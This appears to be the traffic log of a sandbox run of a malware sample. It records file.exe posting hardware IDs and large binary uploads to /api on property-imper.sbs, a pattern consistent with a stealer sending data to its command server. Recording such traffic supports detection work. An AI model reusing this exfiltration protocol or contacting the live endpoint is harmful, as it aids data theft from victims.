                                                                                        Data Ascii: --8YZHJO8XC3MContent-Disposition: form-data; name="hwid"B1B7719ECE567286D7CBBD6DF28D3732--8YZHJO8XC3MContent-Disposition: form-data; name="pid"2--8YZHJO8XC3MContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--8YZHJO8XC3M
                                                                                        2024-11-23 12:57:39 UTC1021INHTTP/1.1 200 OK
                                                                                        Date: Sat, 23 Nov 2024 12:57:38 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=fug2v7d0rk3v5265fdmkl98ju3; expires=Wed, 19-Mar-2025 06:44:17 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jkrVfA3RePtXPEZYkidFcoXJeOSs4oVIBZ%2F%2F8jEYIWIaw6Eg3cLelak1fcJazUTNXpBqd36ap7Dq6NAdRQZ5M%2Bhfwbq6n58IpeIG3%2BNhOFqL%2FCKcxfG8VgamAclqJi5Gky55xwQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8e71537ecd818c12-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1765&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2844&recv_bytes=13758&delivery_rate=1573275&cwnd=177&unsent_bytes=0&cid=afeeb65b4791d41b&ts=852&x=0"
                                                                                        2024-11-23 12:57:39 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                        Data Ascii: eok 8.46.123.75
                                                                                        2024-11-23 12:57:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.649712104.21.33.1164434392C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-23 12:57:40 UTC278OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=D5KV57W0M5CL
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 15075
                                                                                        Host: property-imper.sbs
                                                                                        2024-11-23 12:57:40 UTC15075OUTData Raw: 2d 2d 44 35 4b 56 35 37 57 30 4d 35 43 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 31 42 37 37 31 39 45 43 45 35 36 37 32 38 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 44 35 4b 56 35 37 57 30 4d 35 43 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 35 4b 56 35 37 57 30 4d 35 43 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 44 35 4b 56 35 37 57 30
                                                                                        Data Ascii: --D5KV57W0M5CLContent-Disposition: form-data; name="hwid"B1B7719ECE567286D7CBBD6DF28D3732--D5KV57W0M5CLContent-Disposition: form-data; name="pid"2--D5KV57W0M5CLContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--D5KV57W0
                                                                                        2024-11-23 12:57:41 UTC1018INHTTP/1.1 200 OK
                                                                                        Date: Sat, 23 Nov 2024 12:57:41 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=lpqvupdi3j8gdtn2cl9na6r39m; expires=Wed, 19-Mar-2025 06:44:19 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fTAnY83BjGVSmiunpI%2FPMkAHHTfdrIPwLPL6ZivPylK6mbv1QGpIAK%2BqBK%2Fdr1gFBCi3QrSHMQ93Lar3S1dvk2E0qRoepSrSaG8vThzTYLTGX3WuJa%2B4dnL2GxREBq2X79HT9Xk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8e71538ccfda4223-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1569&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2846&recv_bytes=16011&delivery_rate=1794714&cwnd=205&unsent_bytes=0&cid=0cc9861d7bd2bc66&ts=948&x=0"
                                                                                        2024-11-23 12:57:41 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                        Data Ascii: eok 8.46.123.75
                                                                                        2024-11-23 12:57:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.649713104.21.33.1164434392C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-23 12:57:42 UTC280OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=WO1UNFDP146E3A
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 19945
                                                                                        Host: property-imper.sbs
                                                                                        2024-11-23 12:57:42 UTC15331OUTData Raw: 2d 2d 57 4f 31 55 4e 46 44 50 31 34 36 45 33 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 31 42 37 37 31 39 45 43 45 35 36 37 32 38 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 57 4f 31 55 4e 46 44 50 31 34 36 45 33 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 57 4f 31 55 4e 46 44 50 31 34 36 45 33 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 57 4f
                                                                                        Data Ascii: --WO1UNFDP146E3AContent-Disposition: form-data; name="hwid"B1B7719ECE567286D7CBBD6DF28D3732--WO1UNFDP146E3AContent-Disposition: form-data; name="pid"3--WO1UNFDP146E3AContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--WO
                                                                                        2024-11-23 12:57:42 UTC4614OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00
                                                                                        Data Ascii: +?2+?2+?o?Mp5p_oI
                                                                                        2024-11-23 12:57:43 UTC1023INHTTP/1.1 200 OK
                                                                                        Date: Sat, 23 Nov 2024 12:57:43 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=7livmo56jt3l4l3uhjnag16ikd; expires=Wed, 19-Mar-2025 06:44:22 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DXh6PPpE24qQu1S4Zyz9vGYvOVrqgzRuI4geVoM33nbRPo%2FMYvEeMrA6DNmNnYIP97xZf7%2BGZCH3jtUOg5xilt%2BfEb%2Fi6gutpXUUr6hx9qzDfEbrMt6w2rTMsYTr159rq%2BKS%2FFM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8e71539bdebd19cf-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1876&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=20905&delivery_rate=1599123&cwnd=252&unsent_bytes=0&cid=04083f2902e6eed7&ts=885&x=0"
                                                                                        2024-11-23 12:57:43 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                        Data Ascii: eok 8.46.123.75
                                                                                        2024-11-23 12:57:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.649720104.21.33.1164434392C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-23 12:57:45 UTC273OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=30X3QL46
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 1170
                                                                                        Host: property-imper.sbs
                                                                                        2024-11-23 12:57:45 UTC1170OUTData Raw: 2d 2d 33 30 58 33 51 4c 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 31 42 37 37 31 39 45 43 45 35 36 37 32 38 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 33 30 58 33 51 4c 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 30 58 33 51 4c 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 33 30 58 33 51 4c 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                        Data Ascii: --30X3QL46Content-Disposition: form-data; name="hwid"B1B7719ECE567286D7CBBD6DF28D3732--30X3QL46Content-Disposition: form-data; name="pid"1--30X3QL46Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--30X3QL46Content-Di
                                                                                        2024-11-23 12:57:46 UTC1041INHTTP/1.1 200 OK
                                                                                        Date: Sat, 23 Nov 2024 12:57:46 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=3frabesihjk8358doimj5io91a; expires=Wed, 19-Mar-2025 06:44:24 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V6%2Bj8JbIChVmGqLyDRlvUBhqYQuxaZ7AjagprhMdfKseoGcuGLLGnJIYC0n2p6OHhwn2Hd2xrKFK8xg19lfAb%2Fx10PCySs4YUyqfQyWbIR2%2BBlPSFvRkPxg%2B1Ezx0XZNq9S717w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8e7153ad8f2d3342-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1822&min_rtt=1818&rtt_var=690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2079&delivery_rate=1574973&cwnd=150&unsent_bytes=0&cid=b6955bc00eddebd2&ts=603&x=0"
                                                                                        2024-11-23 12:57:46 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                        Data Ascii: eok 8.46.123.75
                                                                                        2024-11-23 12:57:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.649729104.21.33.1164434392C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-23 12:57:48 UTC279OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=M6P2U4PWMUOP
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 571390
                                                                                        Host: property-imper.sbs
                                                                                        2024-11-23 12:57:48 UTC15331OUTData Raw: 2d 2d 4d 36 50 32 55 34 50 57 4d 55 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 31 42 37 37 31 39 45 43 45 35 36 37 32 38 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 4d 36 50 32 55 34 50 57 4d 55 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 36 50 32 55 34 50 57 4d 55 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4d 36 50 32 55 34 50 57
                                                                                        Data Ascii: --M6P2U4PWMUOPContent-Disposition: form-data; name="hwid"B1B7719ECE567286D7CBBD6DF28D3732--M6P2U4PWMUOPContent-Disposition: form-data; name="pid"1--M6P2U4PWMUOPContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--M6P2U4PW
                                                                                        2024-11-23 12:57:48 UTC15331OUTData Raw: ac bc 51 6a 8a 9e d4 95 c4 f2 c9 b8 ba e4 62 46 e5 67 e9 a2 11 3e a3 87 e1 87 7a b1 b1 e2 0f 8a b8 c5 78 30 8e 6a 9f e2 fd 32 54 a5 1b 24 70 ee 48 11 af 42 44 56 bc fe 0d 13 42 ff fe 68 d8 4f 62 56 88 ce 40 b5 4f ae 8b f5 15 0d 47 32 44 88 6a ba 53 06 00 63 7b a2 02 77 9a 44 c9 98 37 32 8c 89 b0 27 3c 4f b6 56 a5 f7 2d 99 c3 31 83 30 5b 48 70 4b 02 d3 87 86 e3 b9 b7 22 35 3e 5e 1f b7 8d 53 1f 57 7a f9 c5 81 f9 cc c1 9a 65 4f 97 8e db be e5 f7 78 0e 0e 4a 3b 71 e3 45 ad 1f f8 ae 55 68 6e 2c fd 71 97 db 91 00 65 a2 22 59 61 24 58 60 9a 92 af e9 da 40 ea c0 5e 64 64 f7 fb 49 ee 34 4a 9b df b0 e0 1e 1a 8b de ae 0f db 67 69 88 85 67 f1 25 94 e4 15 f6 95 62 48 52 e9 eb ab 96 17 cd d4 0a be 58 f7 f4 7b 72 7f 4c ce d7 fd 5a 7f 2a 3d 1c 11 9a 88 dd 55 5a 12 49 12
                                                                                        Data Ascii: QjbFg>zx0j2T$pHBDVBhObV@OG2DjSc{wD72'<OV-10[HpK"5>^SWzeOxJ;qEUhn,qe"Ya$X`@^ddI4Jgig%bHRX{rLZ*=UZI
                                                                                        2024-11-23 12:57:48 UTC15331OUTData Raw: fa 35 f3 81 96 94 82 4a 76 f3 44 e7 a3 8f e1 15 a2 b7 e9 3f 7c 45 a3 5e 94 f2 de ff 88 24 74 75 b0 5f 38 10 3c 7a 3b 0d e7 0f 64 ae 2d bc 19 ae ee fd a0 4a 6a 38 b2 fb 0e bb b3 ac 76 3c b1 da ab a8 6a 7e 3d 64 d8 ab 6c 64 32 9c bb 92 59 55 b5 b0 f9 21 c4 6f f6 68 19 f9 cb df af 21 c6 bb 00 ee 27 27 ad 9f 66 01 ff fd c8 2c 5f e9 d0 57 87 eb 0a b8 8b e7 59 83 99 81 3b 43 5f c4 9c 37 0e 29 c8 49 2d 6d fe b8 bd 46 1f fd 57 4d d8 c4 f9 eb eb 8d 0c d1 b1 e5 fb 0e d5 f3 df c2 59 63 4f 05 6b 3a 7e af 99 fc 49 e1 5b 0d a7 a3 8a 59 a4 3d 37 92 f6 d0 bb fc 55 6e 5f 1f 16 b6 32 e6 94 38 54 dd 7d 37 54 72 f3 9f 21 f6 7a 55 3d 7f 0e 4b 39 6c 34 f2 ab 87 81 45 79 47 e4 83 fd de 41 41 b0 5f e3 e4 b3 1d 46 de 9f f6 61 60 6e d5 3e c6 99 fc 38 8f 7d 0c f2 99 e3 20 d4 eb 57
                                                                                        Data Ascii: 5JvD?|E^$tu_8<z;d-Jj8v<j~=dld2YU!oh!''f,_WY;C_7)I-mFWMYcOk:~I[Y=7Un_28T}7Tr!zU=K9l4EyGAA_Fa`n>8} W
                                                                                        2024-11-23 12:57:48 UTC15331OUTData Raw: 82 f9 71 a1 52 df 15 d2 a4 76 e8 4f 2c 76 3b c0 87 ff d2 e6 9f f4 55 af 6f 7c c9 8d 63 0a 58 17 22 59 15 73 af 1c 93 c5 c4 fb 22 36 49 ba 69 29 d5 95 32 9e 0d bd 01 45 cd d0 bf cc 89 3f 5b 60 a9 cf f2 29 8c 36 e3 67 13 0e 03 cc ba 3f a3 e9 9e 5b a7 0f 37 f2 ce 7f 45 45 5a 3f df 21 f9 62 06 00 cf 4e c5 19 cc 57 4e d6 3d ff cd 65 fd 37 91 d3 a7 7d 4b 29 59 1b dd b4 cb 7a e3 3d 2d a3 2f 24 7d cf 85 c1 9f 57 e3 d9 30 c4 2d 19 c5 79 ac ba 1d d3 81 77 71 c1 93 af 2e 98 19 ac c8 da 8e da 51 1d 1c 2d 71 36 2a 20 99 bb ec 69 ba 76 ef 0b f5 27 6b 20 cf 94 3e f7 a8 78 e7 ee fe af 43 f6 db 01 fa 3b 85 25 60 38 f1 33 92 44 53 a0 19 f1 03 5d 7e 28 9a 17 4c 94 67 6b a0 bb 79 98 b3 08 a0 84 a4 e0 af 49 1d 4f e6 af ca 94 00 9a 70 04 04 7a 84 ce 15 f3 40 39 fc ed 68 84 10
                                                                                        Data Ascii: qRvO,v;Uo|cX"Ys"6Ii)2E?[`)6g?[7EEZ?!bNWN=e7}K)Yz=-/$}W0-ywq.Q-q6* iv'k >xC;%`83DS]~(LgkyIOpz@9h
                                                                                        2024-11-23 12:57:48 UTC15331OUTData Raw: ea c0 b1 c1 21 26 67 f1 b8 26 44 3b c3 6b 37 cd 76 4b 0c ff ba 94 a4 8e e9 d3 10 07 2e 4f a5 4e 5f 05 53 ac 1d 9e fa 07 da ba 89 2d e6 57 a8 ea 17 6a 0c aa 8d 5a 19 2b 11 ad ff db ba 8e e0 ba 6b 99 71 2a 3c 42 a5 ea 74 26 06 64 95 23 de fc 3f a1 fa ff e4 6c 03 38 cd cc 96 22 02 e6 30 e0 1a 7a 6a c4 5e 12 6a 7a b9 dd f5 8b 13 b0 80 03 72 0c 09 d9 0d 3b 96 08 10 ba 9d af 0a 05 29 c1 e9 c2 2b 06 80 8c 08 13 05 07 ba ee 00 d3 ee fa 60 0c 5b 0d d5 72 ca df a8 70 a8 65 0e ff cf 24 aa 17 7d 74 a8 55 bc 00 19 f3 4a 82 fc c1 0c c2 c9 67 d4 85 18 7d 97 0b 7a 3d 9b ef 2e 8a 23 ca 90 d3 b4 d8 56 5c af a3 70 f2 a0 61 4a 75 ac d2 0d d1 29 94 80 05 91 8a d8 3c bc d4 4e 47 10 d9 17 7d ac 37 67 3f 6e 86 eb 72 77 d6 2a a8 b0 29 20 56 72 12 37 f7 fa 21 9b ad 11 47 87 6f f1
                                                                                        Data Ascii: !&g&D;k7vK.ON_S-WjZ+kq*<Bt&d#?l8"0zj^jzr;)+`[rpe$}tUJg}z=.#V\paJu)<NG}7g?nrw*) Vr7!Go
                                                                                        2024-11-23 12:57:48 UTC15331OUTData Raw: 85 97 34 b2 e0 37 ad 9a 80 ba a2 d9 48 85 18 6c ee 32 77 0d 0e 3e a1 65 09 69 5a 92 20 28 7f 2e f7 bf 75 76 fd 76 cd bc c2 65 70 c7 ef 19 9f ef c8 38 cc 1f e9 7f 67 26 0a 00 c0 11 06 1a 89 50 28 60 ae 4f 4d 3d 18 49 3b 0f e7 87 d7 61 4f 28 37 3a 6f f7 40 5c f5 fe c3 06 60 0d 9b a7 c0 ab 3f 46 6e 0e 51 04 c0 ab a5 36 24 5d 81 45 4f 09 fd 55 7a c0 00 3b 15 a0 81 84 78 11 87 10 26 54 fa 3d 26 f7 34 21 26 b2 da f7 4b ab c0 0b 7d 6f c9 9b 2d 23 7f df b0 63 55 75 1c 72 14 16 ae 7f ae 77 ab f4 fa 1b 88 3c be 71 79 8f 0c d0 be 39 34 f1 0f 66 e3 2b c4 28 ab 3e 86 63 08 8e e9 60 84 a0 85 46 a1 5e c9 9f b2 f4 c6 3d 97 ce e4 62 7d 0b 0b 6a 08 fc 73 70 7c 62 99 8e 68 78 7d 1b 6c 97 8d ca 43 64 f5 c5 83 d8 ce bf 92 93 bf 82 ec 40 f0 c6 94 54 34 f0 8a 71 16 90 f3 f0 57
                                                                                        Data Ascii: 47Hl2w>eiZ (.uvvep8g&P(`OM=I;aO(7:o@\`?FnQ6$]EOUz;x&T=&4!&K}o-#cUurw<qy94f+(>c`F^=b}jsp|bhx}lCd@T4qW
                                                                                        2024-11-23 12:57:48 UTC15331OUTData Raw: c8 07 71 ed 07 e6 94 19 a1 ee 44 81 41 7c 6a dd 71 9f b5 7d 2d 66 2a 92 9b 80 5a 91 fb 52 b6 9b 0d 07 41 9d 5a 4c a9 7e 01 ef 49 ae df 9e 62 6c 48 eb fc 17 ba 20 23 a9 98 8b 45 29 da f1 20 0e 4a d6 d7 3e 84 c8 ec 02 b6 4b ea 96 07 c4 30 30 fe 6c b8 bd 29 a1 d2 ea b9 38 fc 59 20 8d f5 db 95 f5 fb 9f ba 9a 67 11 dc cd 9c ed 49 8e d2 1b d7 1a 45 8e 59 30 4b 61 e1 c8 c6 1e 6b b6 79 fc 62 38 ab 2d 71 47 3d 86 a2 3e c4 a0 32 08 e3 8d 7f bf 7d f1 eb 85 0d dd ee 15 ac fb cc 6b dc 65 64 ff 29 75 a3 d5 19 fa 32 eb 9f dd 52 03 54 55 86 0e 76 aa 87 07 d4 2c 7f ff e9 79 f3 52 88 a5 15 a1 28 6e b3 02 13 35 ff 46 f5 f4 fd 13 77 e6 9d fa 3c fd 72 7b 9e b6 08 04 d0 7d 6f 2a 05 e2 b5 c5 65 d7 94 f6 a2 f0 d1 ab 85 8f 2a 50 d9 57 82 18 a3 c7 d4 c2 7a bf 0b 7a ab fd 31 c9 a3
                                                                                        Data Ascii: qDA|jq}-f*ZRAZL~IblH #E) J>K00l)8Y gIEY0Kakyb8-qG=>2}ked)u2RTUv,yR(n5Fw<r{}o*e*PWzz1
                                                                                        2024-11-23 12:57:48 UTC15331OUTData Raw: fb e8 dc 10 7f 86 54 e5 a3 0c 7f d3 f8 5c 9d b6 32 77 68 72 4e 87 b9 7b f8 db ea 51 7e ce 90 c9 cc b1 fa 9b ec 6a 52 b0 e0 bb ed 20 5d 42 1d 3a d6 04 c0 51 1d 30 dd b9 b3 22 0e 22 39 c7 bc f6 60 f5 bc 99 04 68 19 51 a1 d5 dc bf 4f 7b 20 6a 1a fe 9d bb 4f 25 b5 40 c2 75 eb 8b 47 ae 35 c8 78 99 de df 22 d1 22 56 df cc 14 17 a7 88 ac 1c cf 2e ec ab 6c 78 5e 58 fc d3 1a c1 94 46 65 7c 6e 60 fd 27 04 0f 47 c3 27 44 81 1d fb 03 24 78 52 51 a5 07 90 a0 53 0a 34 9b f6 da 6d 4e 92 8c 84 a8 e4 16 0b c0 7c 75 7f 30 e8 6b 5d 25 4c 91 4e 08 40 c0 89 9c 17 4f 6a 7c b8 57 31 7c 1f 69 a7 31 64 d0 ed 8d b3 20 5d 13 77 19 03 09 03 19 9e 06 d0 d2 5f 7f 88 65 b8 39 1e 80 87 f5 87 98 5e 12 8f 2b cb 24 81 10 d3 51 9a ce 44 37 e9 23 98 0c de 1a e6 ec 25 f6 e5 bd 8c fd bc 73 e4
                                                                                        Data Ascii: T\2whrN{Q~jR ]B:Q0""9`hQO{ jO%@uG5x""V.lx^XFe|n`'G'D$xRQS4mN|u0k]%LN@Oj|W1|i1d ]w_e9^+$QD7#%s
                                                                                        2024-11-23 12:57:48 UTC15331OUTData Raw: df ec 51 5e c2 bd 62 45 7b 25 63 68 ea 08 c8 53 88 0b ed 72 d9 78 3f f7 32 c8 68 57 aa 0d 3a ec 65 93 ee 18 77 30 23 d5 3e 33 72 bf 6c b3 ad de 93 ea a7 98 7e 25 15 38 00 3a f8 d7 3f ba 51 c4 6c d5 61 e6 59 c4 df 57 30 c9 f3 8c 74 76 2e 0b ef ed 03 fd 5a 2d 4c 42 d6 a1 b1 d9 b9 c0 c1 39 aa 0b d1 fc 80 3e 29 54 2f e1 d0 86 a0 28 2f 98 e6 10 53 12 15 5e 7f 21 cc 8d 8a 52 8c f9 d2 ab 6f ff 92 bf 46 69 b8 0d 61 85 85 62 4e 38 0c 55 bd 7c 82 6f e1 d5 29 53 dc 8a 8c e4 3b ce 87 f5 ca 50 55 99 59 07 c3 8c f8 ad 2d e0 19 63 47 cf db 89 f1 e1 f0 ea 93 3f 74 a3 48 1d 2c 54 2c e3 c5 12 17 0b 8a 65 4a 85 d7 cf 5a 50 55 d1 d7 10 94 e6 15 81 67 92 5c d5 20 a1 b8 75 6f 57 26 e8 05 01 02 dc 77 da 82 72 3f b6 9d d5 b4 8b 44 7a 04 eb e3 9a 57 b5 99 aa 6a 2a 39 59 57 c7 7e
